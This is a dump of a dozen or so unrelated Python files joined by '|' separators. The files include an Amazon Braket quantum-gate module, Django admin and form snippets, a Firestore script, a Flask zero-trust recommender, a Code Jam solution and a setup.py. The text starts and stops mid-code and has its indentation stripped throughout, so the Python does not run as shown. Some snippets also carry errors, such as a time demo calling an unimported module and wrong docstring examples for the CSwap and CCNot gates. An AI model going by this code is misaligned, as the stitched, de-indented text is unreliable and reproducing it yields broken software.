b = np.random.rand()
h = np.sqrt(-2. * D / tau * (1. - E**2) * np.log(a)) * np.cos(2. * np.pi * b)
eps[i+1, j] = eps[i, j] * E + h
return eps
# get input parameters (typical values shown)
# open(1,file='fastcnoise.dat')
# read(1,*)nreal !number of realizations=1000
# read(1,*)nstep !max delay in corr. func=10
# read(1,*)dt !time step size=.5
# read(1,*)cortim !corr. time in the same units as DT=5
# read(1,*)ave !average value for gaussian distri
# read(1,*)sigma !sigma for gaussian distribution
# close(1)
# allocate(eps(nreal,-1:nstep*2))
# allocate(flag(nreal))
# flag='N'
# store the noise
#f = open('fastcnoise.out', 'w')
#f.write('{} '.format( sigma*np.sqrt(tau)*eps(:,j) + ave
#f.close()
#! calculate the error in autocorrelation function in variable STD.
# do i=1,nreal
# do j=0,nstep
# std=std+dble((eps(i,j)*eps(i,j+idly)-smean)**2.)
# enddo
# enddo
# std=sqrt(std)/dble(npts-1.)
# write(2,*)idly,mean,std !output results
# enddo
|
# import the module
# get the current clock ticks from the time() function
seconds = basic_examples.time()
print(seconds)
currentTime = time.localtime(seconds)
# print the currentTime variable to know about it
print(currentTime,'\n')
# use current time to show current time in formatted string
print('Current System time is :', time.asctime(currentTime))
print('Formatted Time is :', time.strftime("%d/%m/%Y", currentTime)) |
from attr import attrs
from google.protobuf.message import DecodeError
from .constants import API_URL
from .pb import upload_pb2
from ..models import Call, ParsedResponse
@attrs(slots=True)
class MusicManagerCall(Call):
base_url = API_URL
request_type = response_type = upload_pb2.UploadResponse
def __attrs_post_init__(self, uploader_id):
self._data = self.request_type()
self._data.uploader_id = uploader_id
self._headers.update(
{'Content-Type': 'application/x-google-protobuf'}
)
self._params.update({'version': 1})
if self.endpoint:
self._url = f'{self.base_url}/{self.endpoint}'
@property
def body(self):
"""Binary-encoded body of the HTTP request."""
return self._data.SerializeToString() if self._data else b''
def parse_response(self, response_headers, response_body):
try:
res_body = self.response_type()
res_body.ParseFromString(response_body)
except DecodeError:
raise
# TODO: Better exception.
if not self.check_success(res_body):
raise Exception(f"{self.__class__.__name__} call failed: {res_body}")
return ParsedResponse(headers=response_headers, body=res_body)
|
from django import forms
from django.contrib.auth.forms import AuthenticationForm
class RememberMeAuthenticationForm(AuthenticationForm):
remember = forms.BooleanField(required=False, widget=forms.CheckboxInput())
|
/home/runner/.cache/pip/pool/9e/67/da/1425736d5888390dbe323817b7e6cdf148faef8842822c2be48a25fbf5 |
from django.contrib import admin
from admin_view.admin import CustomAdmin, ModelViewAdmin
from admin_view.views.base import AdminTemplateView
from tests.models import ExampleModel
class ExampleView(AdminTemplateView):
pass
class CustomExampleAdmin(CustomAdmin):
app_label = 'tests'
module_name = 'custom'
verbose_name = 'Custom template admin'
verbose_name_plural = verbose_name
permissions = {
'only_self': "Can view only self orders"
}
add_view = change_view = changelist_view = ExampleView
def get_title(self, obj):
return "A Example admin"
CustomExampleAdmin.register_at(admin.site)
@admin.register(ExampleModel)
class ExampleModelAdmin(admin.ModelAdmin):
pass
class ExampleCloneAdmin(ModelViewAdmin):
model = ExampleModel
app_label = 'tests'
module_name = 'example_model_clone'
list_display = ['title']
list_display_links = ['title']
view_classes = {
'add': AdminTemplateView
}
ExampleCloneAdmin.register_at(admin.site)
|
# Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from enum import Enum
from braket.ir.jaqcd.shared_models import (
Angle,
CompilerDirective,
DampingProbability,
DampingSingleProbability,
DoubleControl,
DoubleTarget,
MultiTarget,
SingleControl,
SingleProbability,
SingleProbability_34,
SingleProbability_1516,
SingleTarget,
TripleProbability,
TwoDimensionalMatrix,
TwoDimensionalMatrixList,
)
"""
Instructions that can be supplied to the braket.ir.jaqcd.Program.
To add a new instruction:
- Implement a class in this module.
- Class must contain a property, "type", that is an enum of the class implemented in the
next step.
- Implement a subclass, "Type", within this class that extends [str, enum].
All enum values must be unique across all instructions, otherwise de-serialization
will have undeterministic behaviors. These enums will be used to determine what type
the instruction is, i.e. what class to use for deserializing.
- NOTE: Due to how multiple inhertiance works in Python it is easiest to define a
type enum class within each instruction, instead of calling the relevant parent
constructors to initialize it correctly.
- Inherit any classes from braket.ir.jaqcd.shared_models.
- Write up docstrings to define the instruction, properties, and examples.
"""
class H(SingleTarget):
"""
Hadamard gate.
Attributes:
type (str): The instruction type. default = "h". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> H(target=1)
"""
class Type(str, Enum):
h = "h"
type = Type.h
class I(SingleTarget): # noqa: E742, E261
"""
Identity gate.
Attributes:
type (str): The instruction type. default = "i". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> I(target=1)
"""
class Type(str, Enum):
i = "i"
type = Type.i
class X(SingleTarget):
"""
Pauli-X gate.
Attributes:
type (str): The instruction type. default = "x". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> X(target=0)
"""
class Type(str, Enum):
x = "x"
type = Type.x
class Y(SingleTarget):
"""
Pauli-Y gate.
Attributes:
type (str): The instruction type. default = "y". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Y(target=0)
"""
class Type(str, Enum):
y = "y"
type = Type.y
class Z(SingleTarget):
"""
Pauli-Z gate.
Attributes:
type (str): The instruction type. default = "z". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Z(target=0)
"""
class Type(str, Enum):
z = "z"
type = Type.z
class Rx(SingleTarget, Angle):
"""
X-axis rotation gate.
Attributes:
type (str): The instruction type. default = "rx". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
Examples:
>>> Rx(target=0, angle=0.15)
"""
class Type(str, Enum):
rx = "rx"
type = Type.rx
class Ry(SingleTarget, Angle):
"""
Y-axis rotation gate.
Attributes:
type (str): The instruction type. default = "ry". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
Examples:
>>> Ry(target=0, angle=0.15)
"""
class Type(str, Enum):
ry = "ry"
type = Type.ry
class Rz(SingleTarget, Angle):
"""
Z-axis rotation gate.
Attributes:
type (str): The instruction type. default = "rz". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
Examples:
>>> Rz(target=0, angle=0.15)
"""
class Type(str, Enum):
rz = "rz"
type = Type.rz
class S(SingleTarget):
"""
S gate. Applies a 90 degree rotation around the Z-axis.
Attributes:
type (str): The instruction type. default = "s". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> S(target=0)
"""
class Type(str, Enum):
s = "s"
type = Type.s
class T(SingleTarget):
"""
T gate. Applies a 45 degree rotation around the Z-axis.
Attributes:
type (str): The instruction type. default = "t". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> T(target=0)
"""
class Type(str, Enum):
t = "t"
type = Type.t
class Si(SingleTarget):
"""
Si gate. Conjugate transpose of S gate.
Attributes:
type (str): The instruction type. default = "si". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Si(target=0)
"""
class Type(str, Enum):
si = "si"
type = Type.si
class Ti(SingleTarget):
"""
Ti gate. Conjugate transpose of T gate.
Attributes:
type (str): The instruction type. default = "ti". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Ti(target=0)
"""
class Type(str, Enum):
ti = "ti"
type = Type.ti
class Swap(DoubleTarget):
"""
Swap gate. Swaps the state of the two qubits.
Attributes:
type (str): The instruction type. default = "swap". (type) is optional.
This should be unique among all instruction types.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> Swap(targets=[0, 1])
"""
class Type(str, Enum):
swap = "swap"
type = Type.swap
class CSwap(SingleControl, DoubleTarget):
"""
Controlled swap gate.
Attributes:
type (str): The instruction type. default = "cswap". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> Swap(control=0, targets=[1, 2])
"""
class Type(str, Enum):
cswap = "cswap"
type = Type.cswap
class ISwap(DoubleTarget):
"""
ISwap gate. Swaps the state of two qubits, applying a -i phase to q1 when it is in the 1 state
and a -i phase to q2 when it is in the 0 state.
This is equivalent to XY(pi)
Attributes:
type (str): The instruction type. default = "iswap". (type) is optional.
This should be unique among all instruction types.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> ISwap(targets=[0, 1])
"""
class Type(str, Enum):
iswap = "iswap"
type = Type.iswap
class PSwap(DoubleTarget, Angle):
"""
Parameterized swap gate that takes in the angle of the phase to apply to the swapped gates.
Attributes:
type (str): The instruction type. default = "pswap". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> PSwap(targets=[0, 1], angle=0.15)
"""
class Type(str, Enum):
pswap = "pswap"
type = Type.pswap
class XY(DoubleTarget, Angle):
"""
Rotates between \\|01> and \\|10> by the given angle.
Attributes:
type (str): The instruction type. default = "xy". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> XY(targets=[0, 1], angle=0.15)
"""
class Type(str, Enum):
xy = "xy"
type = Type.xy
class PhaseShift(SingleTarget, Angle):
"""
Phase shift gate. Shifts the phase between \\|0> and \\|1> by a given angle.
Attributes:
type (str): The instruction type. default = "phaseshift". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> PhaseShift(target=1, angle=0.15)
"""
class Type(str, Enum):
phaseshift = "phaseshift"
type = Type.phaseshift
class CPhaseShift(SingleTarget, SingleControl, Angle):
"""
Controlled phase shift gate.
Attributes:
type (str): The instruction type. default = "cphaseshift". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CPhaseShift(control=0, target=1, angle=0.15)
"""
class Type(str, Enum):
cphaseshift = "cphaseshift"
type = Type.cphaseshift
class CPhaseShift00(SingleTarget, SingleControl, Angle):
"""
Controlled phase shift gate that phases the \\|00> state.
Attributes:
type (str): The instruction type. default = "cphaseshift00". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CPhaseShift00(control=0, target=1, angle=0.15)
"""
class Type(str, Enum):
cphaseshift00 = "cphaseshift00"
type = Type.cphaseshift00
class CPhaseShift01(SingleTarget, SingleControl, Angle):
"""
Controlled phase shift gate that phases the \\|01> state.
Attributes:
type (str): The instruction type. default = "cphaseshift01". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CPhaseShift01(control=0, target=1, angle=0.15)
"""
class Type(str, Enum):
cphaseshift01 = "cphaseshift01"
type = Type.cphaseshift01
class CPhaseShift10(SingleTarget, SingleControl, Angle):
"""
Controlled phase shift gate that phases the \\|10> state.
Attributes:
type (str): The instruction type. default = "cphaseshift10". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CPhaseShift10(control=0, target=1, angle=0.15)
"""
class Type(str, Enum):
cphaseshift10 = "cphaseshift10"
type = Type.cphaseshift10
class CNot(SingleTarget, SingleControl):
"""
Controlled not gate. Also known as the CX gate.
Attributes:
type (str): The instruction type. default = "cnot". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CNot(control=0, target=1)
"""
class Type(str, Enum):
cnot = "cnot"
type = Type.cnot
class CCNot(SingleTarget, DoubleControl):
"""
Doubly-controlled NOT gate. Also known as the Toffoli gate.
Attributes:
type (str): The instruction type. default = "ccnot". (type) is optional.
This should be unique among all instruction types.
controls (int): The control qubits.
This is a list with two items and all items are int >= 0.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CCNot(control=[0,1], target=1)
"""
class Type(str, Enum):
ccnot = "ccnot"
type = Type.ccnot
class CY(SingleTarget, SingleControl):
"""
Controlled Y-gate.
Attributes:
type (str): The instruction type. default = "cy". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CY(control=0, target=1)
"""
class Type(str, Enum):
cy = "cy"
type = Type.cy
class CZ(SingleTarget, SingleControl):
"""
Controlled Z-gate.
Attributes:
type (str): The instruction type. default = "cz". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CZ(control=0, target=1)
"""
class Type(str, Enum):
cz = "cz"
type = Type.cz
class XX(DoubleTarget, Angle):
"""
The Ising (XX) gate.
Attributes:
type (str): The instruction type. default = "xx". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> XX(targets=[0, 1], angle=0.15)
"""
class Type(str, Enum):
xx = "xx"
type = Type.xx
class YY(DoubleTarget, Angle):
"""
The Ising (YY) gate.
Attributes:
type (str): The instruction type. default = "yy". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> YY(targets=[0, 1], angle=0.15)
"""
class Type(str, Enum):
yy = "yy"
type = Type.yy
class ZZ(DoubleTarget, Angle):
"""
The Ising (ZZ) gate.
Attributes:
type (str): The instruction type. default = "zz". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> ZZ(targets=[0, 1], angle=0.15)
"""
class Type(str, Enum):
zz = "zz"
type = Type.zz
class V(SingleTarget):
"""
Square root of NOT gate.
Attributes:
type (str): The instruction type. default = "v". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> V(target=0)
"""
class Type(str, Enum):
v = "v"
type = Type.v
class Vi(SingleTarget):
"""
Conjugate transpose of square root of NOT gate.
Attributes:
type (str): The instruction type. default = "vi". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Vi(target=0)
"""
class Type(str, Enum):
vi = "vi"
type = Type.vi
class Unitary(TwoDimensionalMatrix, MultiTarget):
"""
Arbitrary unitary matrix gate
Attributes:
type (str): The instruction type. default = "unitary". (type) is optional.
This should be unique among all instruction types.
targets (List[int]): The target qubits. This is a list with ints and all ints >= 0.
matrix (List[List[List[float]]]): The unitary matrix specifying the behavior of the gate.
Examples:
>>> Unitary(targets=[0], matrix=[[[0, 0], [1, 0]],[[1, 0], [0, 1]]])
"""
class Type(str, Enum):
unitary = "unitary"
type = Type.unitary
class BitFlip(SingleTarget, SingleProbability):
"""
Bit Flip noise channel.
Attributes:
type (str): The instruction type. default = "bit_flip". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> BitFlip(target=1, probability=0.1)
"""
class Type(str, Enum):
bit_flip = "bit_flip"
type = Type.bit_flip
class PhaseFlip(SingleTarget, SingleProbability):
"""
Phase Flip noise channel.
Attributes:
type (str): The instruction type. default = "phase_flip". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> PhaseFlip(target=1, probability=0.1)
"""
class Type(str, Enum):
phase_flip = "phase_flip"
type = Type.phase_flip
class PauliChannel(SingleTarget, TripleProbability):
"""
Genearal Pauli noise channel.
Attributes:
type (str): The instruction type. default = "pauli_channel". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> PauliChannel(target=1, probX=0.1, probY=0.2, probZ=0.3)
"""
class Type(str, Enum):
pauli_channel = "pauli_channel"
type = Type.pauli_channel
class Depolarizing(SingleTarget, SingleProbability_34):
"""
Depolarizing noise channel.
Attributes:
type (str): The instruction type. default = "depolarizing". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Depolarizing(target=1, probability=0.1)
"""
class Type(str, Enum):
depolarizing = "depolarizing"
type = Type.depolarizing
class TwoQubitDepolarizing(DoubleTarget, SingleProbability_1516):
"""
Two-Qubit Depolarizing noise channel.
Attributes:
type (str): The instruction type. default = "two_qubit_depolarizing".
(type) is optional. This should be unique among all instruction types.
target (int): The target qubits. This is an int >= 0.
Examples:
>>> TwoQubitDepolarizing(target1=0, target2=1, probability=0.1)
"""
class Type(str, Enum):
two_qubit_depolarizing = "two_qubit_depolarizing"
type = Type.two_qubit_depolarizing
class TwoQubitDephasing(DoubleTarget, SingleProbability_34):
"""
Two-Qubit Dephasing noise channel.
Attributes:
type (str): The instruction type. default = "two_qubit_dephasing".
(type) is optional. This should be unique among all instruction types.
target (int): The target qubits. This is an int >= 0.
Examples:
>>> TwoQubitDephasing(target1=0, target2=1, probability=0.1)
"""
class Type(str, Enum):
two_qubit_dephasing = "two_qubit_dephasing"
type = Type.two_qubit_dephasing
class AmplitudeDamping(SingleTarget, DampingProbability):
"""
Amplitude Damping noise channel.
Attributes:
type (str): The instruction type. default = "amplitude_damping". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> AmplitudeDamping(target=1, gamma=0.1)
"""
class Type(str, Enum):
amplitude_damping = "amplitude_damping"
type = Type.amplitude_damping
class GeneralizedAmplitudeDamping(SingleTarget, DampingProbability, DampingSingleProbability):
"""
Generalized Amplitude Damping noise channel.
Attributes:
type (str): The instruction type. default = "generalized_amplitude_damping". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> GeneralizedAmplitudeDamping(target=1, gamma=0.1, probability=0.9)
"""
class Type(str, Enum):
generalized_amplitude_damping = "generalized_amplitude_damping"
type = Type.generalized_amplitude_damping
class PhaseDamping(SingleTarget, DampingProbability):
"""
Phase Damping noise channel.
Attributes:
type (str): The instruction type. default = "phase_damping". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> PhaseDamping(target=1, gamma=0.1)
"""
class Type(str, Enum):
phase_damping = "phase_damping"
type = Type.phase_damping
class Kraus(TwoDimensionalMatrixList, MultiTarget):
"""
Arbitrary quantum channel defined by the input matrices.
Attributes:
type (str): The instruction type. default = "kraus". (type) is optional.
This should be unique among all instruction types.
targets (List[int]): The target qubits. This is a list with ints and all ints >= 0.
matrices (List[List[List[List[float]]]]): A list of matrices specifying
the quantum channel. A complex number is represented as a list of 2
real numbers. So each matrix has type List[List[List[float]]].
Examples:
>>> matrix1 = [[[1/sqrt(2), 0],[0, 0]],[[0, 0],[1/sqrt(2), 0]]]
>>> matrix2 = [[[0, 0],[1/sqrt(2), 0]],[[1/sqrt(2), 0],[0, 0]]]
>>> matrices = [matrix1, matrix2]
>>> Kraus(targets=[0], matrices=matrices)
"""
class Type(str, Enum):
kraus = "kraus"
type = Type.kraus
class StartVerbatimBox(CompilerDirective):
"""
StartVerbatimBox is a compiler instruction to start a portion of code that
will preserve the instruction within StartVerbatimBox and EndVerbatimBox
from being modified in any way by the compiler.
Attributes:
type (str): The instruction type. default = "start_verbatim_box". (type) is optional.
This should be unique among all instruction types.
Examples:
>>> StartVerbatimBox()
"""
class Type(str, Enum):
start_verbatim_box = "start_verbatim_box"
type = Type.start_verbatim_box
directive: str = "StartVerbatimBox"
class EndVerbatimBox(CompilerDirective):
"""
EndVerbatimBox is a compiler instruction to mark the end of a portion of code
that preserves the instruction within StartVerbatimBox and EndVerbatimBox
from being modified in any way by the compiler.
Attributes:
type (str): The instruction type. default = "end_verbatim_box". (type) is optional.
This should be unique among all instruction types.
Examples:
>>> EndVerbatimBox()
"""
class Type(str, Enum):
end_verbatim_box = "end_verbatim_box"
type = Type.end_verbatim_box
directive: str = "EndVerbatimBox"
|
import numpy
from torch import nn
import torch
|
from cktgen.cktgen import *
if __name__ == "__main__":
args,tech = parse_args()
ndev = ADT( tech, "n",npp=6,nr=1)
ndev.addM1Terminal( "s", 1)
ndev.addM1Terminal( "g", 3)
ndev.addM1Terminal( "d", 5)
pdev = ADT( tech, "p",npp=6,nr=1)
pdev.addM1Terminal( "s", 1)
pdev.addM1Terminal( "g", 3)
pdev.addM1Terminal( "d", 5)
# python cktgen.py --block_name mydesign
def xg( x):
return tech.pitchPoly*tech.halfXGRGrid*2*x
def yg( y):
return tech.pitchDG *tech.halfYGRGrid*2*y
def mirrorAcrossYAxis( adt):
return ADITransform.mirrorAcrossYAxis().preMult( ADITransform.translate( adt.bbox.urx, 0))
# n = 18
# k = (n-2)//2
k = 8
n = 2*k+3
netl = Netlist( nm=args.block_name, bbox=Rect( 0,0, xg(n), yg(n)))
adnetl = ADNetlist( args.block_name)
#left and right
for i in range(n-3-k):
sx = 0
sy = n-2-i
fx = n-1
fy = n-3-k-i
adnetl.addInstance( ADI( ndev, ("un%d" % i), ADITransform.translate( xg(sx), yg(sy))))
adnetl.addInstance( ADI( pdev, ("vn%d" % i), mirrorAcrossYAxis( pdev).preMult( ADITransform.translate( xg(fx), yg(fy)))))
for (f,a) in [('g','i'),('d','o'),('s','z')]:
adnetl.connect( 'un%d' % i, f, ('%s%d' % (a,i)))
adnetl.connect( 'vn%d' % i, f, ('%s%d' % (a,i)))
#top and bot
for i in range(n-3-k):
sy = 0
fy = n-1
sx = n-2-i
fx = n-3-k-i
adnetl.addInstance( ADI( ndev, ("up%d" % i), ADITransform.translate( xg(sx), yg(sy))))
adnetl.addInstance( ADI( pdev, ("vp%d" % i), mirrorAcrossYAxis( pdev).preMult( ADITransform.translate( xg(fx), yg(fy)))))
for (f,a) in [('g','a'),('d','b'),('s','c')]:
adnetl.connect( 'up%d' % i, f, ('%s%d' % (a,i)))
adnetl.connect( 'vp%d' % i, f, ('%s%d' % (a,i)))
adnetl.genNetlist( netl)
hly = "metal4"
hWidth = tech.halfWidthM4[0]*2
vly = "metal5"
vWidth = tech.halfWidthM5[0]*2
for i in range(n-3-k):
sx = 0
fx = n-1
mx = n-2-i
sy = n-2-i
fy = n-3-k-i
for p in ['i','o','z']:
netl.newGR( ('%s%d' % (p,i)), Rect( sx, sy, mx, sy), hly, hWidth)
netl.newGR( ('%s%d' % (p,i)), Rect( mx, sy, mx, fy), vly, vWidth)
netl.newGR( ('%s%d' % (p,i)), Rect( mx, fy, fx, fy), hly, hWidth)
for i in range(n-3-k):
sy = 0
fy = n-1
my = n-3-i-k
sx = n-2-i
fx = n-3-k-i
for p in ['a','b','c']:
netl.newGR( ('%s%d' % (p,i)), Rect( sx, sy, sx, my), vly, vWidth)
netl.newGR( ('%s%d' % (p,i)), Rect( sx, my, fx, my), hly, hWidth)
netl.newGR( ('%s%d' % (p,i)), Rect( fx, my, fx, fy), vly, vWidth)
pathlib.Path("INPUT").mkdir(parents=True, exist_ok=True)
tech.write_files( "INPUT", netl.nm, netl.bbox.toList())
netl.write_files( tech, "INPUT", args)
|
"""
Currently, the code is tested by running:
https://github.com/Minyus/pipelinex_pytorch/blob/master/main.py
# TODO: Add test code.
"""
|
import firebase_admin
from firebase_admin import credentials, firestore
cred = credentials.Certificate("./bnode-2cd0d-firebase-adminsdk-eyxsn-c90ed335bb.json")
firebase_admin.initialize_app(cred)
db = firestore.client()
docs = db.collection('users').get()
for doc in docs:
print(doc.to_dict())
data = {
u'name': u'Los Angeles',
u'state': u'CA',
u'country': u'USA'
}
# Add a new doc in collection 'cities' with ID 'LA'
db.collection(u'cities').document(u'LA').set(data) |
from flask import Flask, redirect, render_template, request, flash, url_for, session
import numpy as np
import pickle
from settings.settings import DEV
app = Flask(__name__)
app.config.from_object(DEV)
# load model
with open('model.pkl', 'rb') as file:
model = pickle.load(file)
@app.route("/", methods=["GET","POST"])
def index():
if request.method == "POST":
institution =request.form['institution']
sda =request.form['sda']
sdwan =request.form['sdwan']
sddc =request.form['sddc']
segmentation =request.form['segmentation']
encryption =request.form['encryption']
mfa =request.form['mfa']
sso =request.form['sso']
policy_engine =request.form['policy_engine']
mdm =request.form['mdm']
dlp =request.form['dlp']
response_list = [institution, sda, sdwan, sddc, segmentation, encryption, mfa, sso, policy_engine, mdm, dlp ]
float_resp_list = list(map(lambda x: float(x), response_list))
# make prediction using model loaded
prediction = model.predict(np.array(float_resp_list))
recommend = {}
# print("jjjj",float_resp_list)
if float_resp_list[6] != 5:
recommend["MFA"] = "Adopt multifactor authentication to help protect your applications by requiring users to confirm their identity using a second source of validation, such as a phone or token, before access is granted."
if float_resp_list[7] != 5:
recommend["SSO"] ="Adopt SSO not only strengthens security by removing the need to manage multiple credentials for the same person but also delivers a better user experience with fewer sign-in prompts."
if float_resp_list[5] != 1:
recommend["Encryption"] = "At a minimum, setup encrypted admin access and embark to encrypt all traffic as organizations that fail to protect data in transit are more susceptible to man-in-the- middle attacks, eavesdropping, and session hijacking. These attacks can be the first step attackers use to gain access to confidential data."
if float_resp_list[4] != 1:
recommend["Segmention"]= "Implement network segmentation through software-defined perimeters to reduce the lateral movement of threats."
if float_resp_list[-1] != 1:
recommend["DLP"] = "Adopt Data Loss Prevention Mechanisms. Once data access is granted, controlling what the user can do with your data is critical. For example, if a user accesses a document with a corporate identity, you want to prevent that document from being saved in an unprotected consumer storage location, or from being shared with a consumer communication or chat app."
if float_resp_list[-3] != 1:
recommend["Policy Engine"] = "Implement network access control to enforce granular control with risk-based adaptive access policies that integrate across endpoints, apps, and networks to better protect your data."
if float_resp_list[-2] != 5:
recommend["MDM"] ="Set up Mobile Device Management for internal users. MDM solutions enable endpoint provisioning, configuration, automatic updates, device wipe, and other remote actions."
flash("Successfully Returned Zero Trust Level Prediction", 'success')
return redirect(url_for("results", res=prediction, recom=recommend))
return render_template("index.html")
@app.route("/results/<res>/<recom>", methods=["GET"])
def results(res, recom):
# Prediction Cleaning
r = [i.replace("\n", "") for i in list(res[2:-2].split(" ")) if i != ""]
s = [f'{float(j):.5f}' for j in r]
t = [(str(round((float(i)*100), 2)) + "%") for i in s]
# Recom Cleaning
import ast
print("res 2", type((recom)))
res = ast.literal_eval(recom)
print("recommendations afre", res)
return render_template("results.html", results=t,recom=res)
if __name__ == "__main__":
app.run(debug=True) |
# Copyright (c) 2021 kamyu. All rights reserved.
#
# Google Code Jam 2021 Round 2 - Problem A. Minimum Sort
# https://codingcompetitions.withgoogle.com/codejam/round/0000000000435915/00000000007dc51c
#
# Time: O(ClogN) = C/N + C/(N-1) + ... + C/2 = 4.187 * 10^8 (given N = 100, C = 10^8)
# Space: O(1)
#
# Usage: python interactive_runner.py python3 testing_tool.py -- python minimum_sort.py
#
from sys import stdout
def query(i, j):
print "M %s %s" % (i, j)
stdout.flush()
return input()
def swap(i, j):
print "S %s %s" % (i, j)
stdout.flush()
return input()
def done():
print "D"
stdout.flush()
return input()
def minimum_sort():
for i in xrange(1, N):
idx = query(i, N)
if idx != i:
swap(i, idx)
if done() != 1:
exit()
T, N = map(int, raw_input().strip().split())
for case in xrange(T):
minimum_sort()
|
from setuptools import setup, find_packages
VERSION = "1.0.1"
def read_file(filepath):
with open(filepath) as f:
return f.read()
setup(
name="django-seo2",
version=VERSION,
description="A framework for managing SEO metadata in Django.",
long_description=read_file('README.rst'),
url="https://github.com/romansalin/django-seo2",
author="Roman Salin",
author_email="[email protected]",
keywords="seo django framework",
license="MIT",
include_package_data=True,
zip_safe=False,
packages=find_packages(exclude=["docs*", "tests*"]),
install_requires=[],
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Web Environment",
"Framework :: Django",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Indexing/Search",
"Topic :: Internet :: WWW/HTTP :: Site Management",
"Topic :: Software Development :: Libraries :: Application Frameworks",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
],
test_suite="tests.runtests.runtests",
)
|
#openfi
#escape char in the olxlo produced file will need substitute at later date
#for runtime on the second loop of instantiation self.populate
dxpone = {
"name":"dxpone",
"refapione":"dxponeapione --- Hi and welcome to the text case scenario that will be used to insert \
towards a discord or something similar to justify the text that will be written t it as an extsion \
